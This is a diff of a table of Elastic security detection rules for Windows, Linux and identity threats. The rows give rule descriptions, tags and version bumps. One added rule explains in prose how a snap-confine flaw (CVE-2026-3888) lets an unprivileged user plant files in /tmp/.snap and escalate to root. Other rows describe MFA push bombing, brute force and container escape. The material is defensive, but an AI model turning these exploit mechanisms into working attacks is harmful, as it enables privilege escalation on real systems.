 |<> |Identifies attempt to perform session hijack via COM object registry modification by setting the RunAs value to Interactive User. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Sysmon], [Resources: Investigation Guide] |None |4
@@ -2262,6 +2300,8 @@ and their rule type is `machine_learning`.
 |<> |Identifies a privilege escalation attempt via exploiting CVE-2022-38028 to hijack the print spooler service execution. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |208
+|<> |This rule detects non-root file creation within "/tmp/.snap" or its host backing path "/tmp/snap-private-tmp/*/tmp/.snap", which may indicate exploitation attempts related to CVE-2026-3888. In vulnerable Ubuntu systems, the snap-confine utility normally creates the "/tmp/.snap" directory as root when initializing a snap sandbox. The vulnerability arises when systemd-tmpfiles deletes this directory after it becomes stale, allowing an unprivileged user to recreate it and populate attacker-controlled files. During subsequent snap sandbox initialization, snap-confine may bind-mount or trust these attacker-controlled paths, enabling manipulation of libraries or configuration files that can lead to local privilege escalation to root. Because legitimate creation of ".snap" directories should only be performed by root, non-root file activity in these locations is highly suspicious. This detection helps identify early stages of the exploit before privilege escalation is completed. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Use Case: Vulnerability], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1
+
 |<> |Detects when an attacker abuses the Multi-Factor authentication mechanism by repeatedly issuing login requests until the user eventually accepts the Okta push notification.
An adversary may attempt to bypass the Okta MFA policies configured for an organization to obtain unauthorized access. |[Domain: Identity], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta], [Data Source: Okta System Logs], [Resources: Investigation Guide] |None |417
 |<> |This rule monitors for the execution of suspicious commands via screen and tmux. When launching a command and detaching directly, the commands will be executed in the background via its parent process. Attackers may leverage screen or tmux to execute commands while attempting to evade detection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |110
@@ -2332,7 +2372,7 @@ and their rule type is `machine_learning`.
 |<> |Identifies a privilege escalation attempt via a rogue Windows directory (Windir) environment variable. This is a known primitive that is often combined with other vulnerabilities to elevate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |313
-|<> |Identifies multiple consecutive logon failures targeting an Admin account from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs] |None |117
+|<> |Identifies multiple consecutive logon failures targeting more than one Admin account from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs] |None |118
 |<> |This rule detects the creation of privileged containers that mount host directories into the container's filesystem. Such configurations can be exploited by attackers to escape the container isolation and gain access to the host system, potentially leading to privilege escalation and lateral movement within the environment.
|[Domain: Endpoint], [Domain: Container], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |1 
@@ -2400,7 +2440,7 @@ and their rule type is `machine_learning`.
 |<> |Identifies registry write modifications to enable Remote Desktop Protocol (RDP) access. This could be indicative of adversary lateral movement preparation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |315
-|<> |Identifies the execution of a Python script that uses the ROT cipher for letters substitution. Adversaries may use this method to encode and obfuscate part of their malicious code in legit python packages. |[Domain: Endpoint], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |4
+|<> |Identifies the execution of a Python script that uses the ROT cipher for letters substitution. Adversaries may use this method to encode and obfuscate part of their malicious code in legit python packages. |[Domain: Endpoint], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |5
 |<> |This rule detects network events that may indicate the use of RPC traffic from the Internet. RPC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. |[Tactic: Initial Access], [Domain: Endpoint], [Use Case: Threat Detection], [Data Source: PAN-OS], [Resources: Investigation Guide] |None |108
@@ -2440,11 +2480,11 @@ and their rule type is `machine_learning`.
 |<> |Identifies attempts to open a remote desktop file from suspicious paths. Adversaries may abuse RDP files for initial access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |6
-|<> |Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |None |120
+|<> |Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |None |121
 |<